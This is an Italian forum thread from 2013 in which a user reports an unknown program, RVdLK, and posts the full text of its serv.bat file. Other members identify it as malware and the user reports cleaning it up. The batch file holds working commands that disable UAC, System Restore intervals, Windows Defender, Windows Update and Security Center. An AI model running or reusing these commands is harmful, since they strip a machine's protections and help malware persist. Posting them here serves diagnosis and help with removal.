Torna indietro   Hardware Upgrade Forum > Networking e sicurezza > Antivirus e Sicurezza > Aiuto sono infetto! Cosa faccio?

Recensione Google Pixel 10a, si migliora poco ma è sempre un'ottima scelta
Recensione Google Pixel 10a, si migliora poco ma è sempre un'ottima scelta
Google ha appena rinnovato la sua celebre serie A con il Pixel 10a, lo smartphone della serie più conveniente se consideriamo il rapporto tra costo e prestazioni. Con il chip Tensor G4, un design raffinato soprattutto sul retro e l'integrazione profonda di Gemini, il colosso di Mountain View promette un'esperienza premium a un prezzo accessibile. E il retro non ha nessuno scalino
6G, da rete che trasporta dati a rete intelligente: Qualcomm accelera al MWC 2026
6G, da rete che trasporta dati a rete intelligente: Qualcomm accelera al MWC 2026
Al MWC Qualcomm annuncia una coalizione industriale per lanciare il 6G entro il 2029 e introduce agenti IA per la gestione autonoma della RAN. Ericsson, presente sul palco, conferma la direzione: le reti del futuro saranno IA-native fin dalla progettazione
CHUWI CoreBook Air alla prova: design premium, buona autonomia e qualche compromesso
CHUWI CoreBook Air alla prova: design premium, buona autonomia e qualche compromesso
CHUWI CoreBook Air è un ultraleggero da 1 kg con Ryzen 5 6600H, display 14" 16:10 e 16 GB LPDDR5. Offre buona portabilità, autonomia discreta e costruzione in alluminio, ma storage PCIe 3.0 e RAM saldata limitano l'espandibilità. A 549 euro sfida brand più noti nella stessa fascia di mercato.
Tutti gli articoli Tutte le news

Vai al Forum
Rispondi
 
Strumenti
Old 08-06-2013, 19:10   #1
chairam
Senior Member
 
Iscritto dal: Oct 2001
Messaggi: 518
Virus o troiano non rilevato: ditemi se non lo è questo

Buongiorno
appena successo che windows 7 mi chiede il permesso di eseguire un programma di nome RVdLK
allora indago: scopro che mi trovo questa cartella:
C:\Users\Rob\AppData\Roaming\RVdLK_virus
con data di oggi, io non ricordo di aver installato sta roba e non so cosa sia
il contenuto è:
***********************************
Directory of C:\Users\Rob\AppData\Roaming\RVdLK

08/06/2013 19:00 <DIR> .
08/06/2013 19:00 <DIR> ..
08/06/2013 18:08 0 D1
08/06/2013 18:03 668.160 RVdLK.exe
08/06/2013 18:03 5.430 RVdLK.ico
08/06/2013 18:03 222 RVdLK.ini
08/06/2013 18:03 232 RVdLK.log
08/06/2013 18:08 824 serv.bat
7 File(s) 674.868 bytes
2 Dir(s) 14.864.527.360 bytes free
***********************************
che non si capisce bene cosa sia
riporto serv.bat
che a quanto capisco disattiva sistemi di sicurezza di windows, firewall, antitroiano etc..
***********************************
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system" /v EnableLUA /t REG_DWORD /d 0 /f
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system" /v EnableVirtualization /t REG_DWORD /d 0 /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v RPSessionInterval /t REG_DWORD /d 0 /f
sc stop windefend
sc stop msmpsvc
sc stop wuauserv
sc stop wscsvc
ping localhost -w 1000 -n 3 > nul
sc config windefend start= disabled
sc config msmpsvc start= disabled
sc config wuauserv start= disabled
sc config wscsvc start= disabled
sc config luafv start= disabled
ping localhost -w 1000 -n 2 > nul
reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v MSASCui /f
reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Windows Defender" /f
***********************************
nel registro di configurazione ha inserito una chiave in
...\windows\CurrentVersion\Run a nome SD214 che lancia RVdLK.exe

il mio antivirus Avira Free non lo classifica come virus
spybot non ha trovato da lamentarsi

non mi sono fidato, ho negato l'autorizzazione all'esecuzione
ho 'sputtanato' la chiave di registro e la cartella appena apparsa
per me sto coso non è niente di buono

sarei felice di sentire qualche opinione
Grazie
__________________
chairam
chairam è offline   Rispondi citando il messaggio o parte di esso
Old 08-06-2013, 19:33   #2
nV 25
Bannato
 
L'Avatar di nV 25
 
Iscritto dal: Jan 2003
Città: Lucca
Messaggi: 9119
malware al 100%
nV 25 è offline   Rispondi citando il messaggio o parte di esso
Old 08-06-2013, 19:36   #3
nV 25
Bannato
 
L'Avatar di nV 25
 
Iscritto dal: Jan 2003
Città: Lucca
Messaggi: 9119
disabilita l'UAC (reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system" /v EnableLUA /t REG_DWORD /d 0 /f) perchè evidentemente richiede privilegi maggiori di quelli standard, ecc.

Malware 100% indipendentemente dal responso di Avira..
nV 25 è offline   Rispondi citando il messaggio o parte di esso
Old 08-06-2013, 19:37   #4
chairam
Senior Member
 
Iscritto dal: Oct 2001
Messaggi: 518
C'è modo di sapere come ha fatto arrivare sul mio hd, come è stato lanciato, installato... qualche indizio insomma, non vorrei trovarmelo reinstallato con un altro nome
__________________
chairam
chairam è offline   Rispondi citando il messaggio o parte di esso
Old 08-06-2013, 19:39   #5
nV 25
Bannato
 
L'Avatar di nV 25
 
Iscritto dal: Jan 2003
Città: Lucca
Messaggi: 9119
giro rapido di hitmanpro/malwarebytes per scrupolo.

Sul sapere da dove è entrato, ci vorrebbe la sfera di cristallo.

Solitamente è il browser:
hai Java?

OS?
UAC (ovviamente) attivo (giusto?) e a su che livello?
nV 25 è offline   Rispondi citando il messaggio o parte di esso
Old 08-06-2013, 20:02   #6
chairam
Senior Member
 
Iscritto dal: Oct 2001
Messaggi: 518
ho java e adesso faccio l'aggiornamento
UAC poi controllo e ti faccio sapere
intanto mote grazie
__________________
chairam
chairam è offline   Rispondi citando il messaggio o parte di esso
Old 10-06-2013, 10:08   #7
chairam
Senior Member
 
Iscritto dal: Oct 2001
Messaggi: 518
os win7 ultimate 64bit
hitman pro mi trova tanti tracking cookie cosa che non mi preoccupa più di tanto
e un paio di malaware

uno dei due è heurlik
simpaticamente avira lanciato sull'eseguibuile non si lamenta neanche (ma che caxxo)

hitman dice anche che ho un proxy in locale questa si cosa brutta ma, pare che sia un falso allarme perchè cercando la sua porta 21320 con netstat -b -a scopro che è sdfssvc.exe che è un eseguibile nella cartella di spybot search&destroy
ma che cavolo fanno queli di spybot search&destroy mi installano un cavolo di proxy che non mi fa più partire alcune applicazioni java e manco me lo dicono accidenti a loro? boh
vale la pena tenerlo sto spybot? da un po' non lo tenevo più perché mi appesantiva troppo la macchina

per il resto pare che il grosso della minaccia sia stato sventato
tnx
__________________
chairam
chairam è offline   Rispondi citando il messaggio o parte di esso
 Rispondi


Recensione Google Pixel 10a, si migliora poco ma è sempre un'ottima scelta Recensione Google Pixel 10a, si migliora poco ma...
6G, da rete che trasporta dati a rete intelligente: Qualcomm accelera al MWC 2026 6G, da rete che trasporta dati a rete intelligen...
CHUWI CoreBook Air alla prova: design premium, buona autonomia e qualche compromesso CHUWI CoreBook Air alla prova: design premium, b...
Roborock Saros 20: il robot preciso e molto sottile Roborock Saros 20: il robot preciso e molto sott...
ASUS ROG Kithara: quando HIFIMAN incontra il gaming con driver planari da 100mm ASUS ROG Kithara: quando HIFIMAN incontra il gam...
Rocket Lab ha posticipato il lancio del ...
Dalla missione Artemis IV il razzo spazi...
Una delle sonde europee di ESA Proba-3 h...
Un modder fa girare Linux su PS5: GTA V ...
MacBook Neo: nessuna sorpresa nei primi ...
La serie POCO X8 Pro è pronta al ...
Smartphone: 2026 difficile per il mercat...
Star Wars: Knights of the Old Republic R...
Huang, NVIDIA: OpenClaw ha realizzato in...
Annunciano il recupero di 4,8 milioni di...
Oggi degli ottimi auricolari Sony con ca...
Muffa in casa? Questo deumidificatore da...
Sonos Era 100: il punto d'ingresso per u...
"Non stiamo sostituendo nessuno con...
Tutti i robot in offerta ora: prezzi bas...
Chromium
GPU-Z
OCCT
LibreOffice Portable
Opera One Portable
Opera One 106
CCleaner Portable
CCleaner Standard
Cpu-Z
Driver NVIDIA GeForce 546.65 WHQL
SmartFTP
Trillian
Google Chrome Portable
Google Chrome 120
VirtualBox
Tutti gli articoli Tutte le news Tutti i download

Strumenti

Regole
Non Puoi aprire nuove discussioni
Non Puoi rispondere ai messaggi
Non Puoi allegare file
Non Puoi modificare i tuoi messaggi

Il codice vB è On
Le Faccine sono On
Il codice [IMG] è On
Il codice HTML è Off
Vai al Forum


Tutti gli orari sono GMT +1. Ora sono le: 00:59.


Powered by vBulletin® Version 3.6.4
Copyright ©2000 - 2026, Jelsoft Enterprises Ltd.
Served by www3v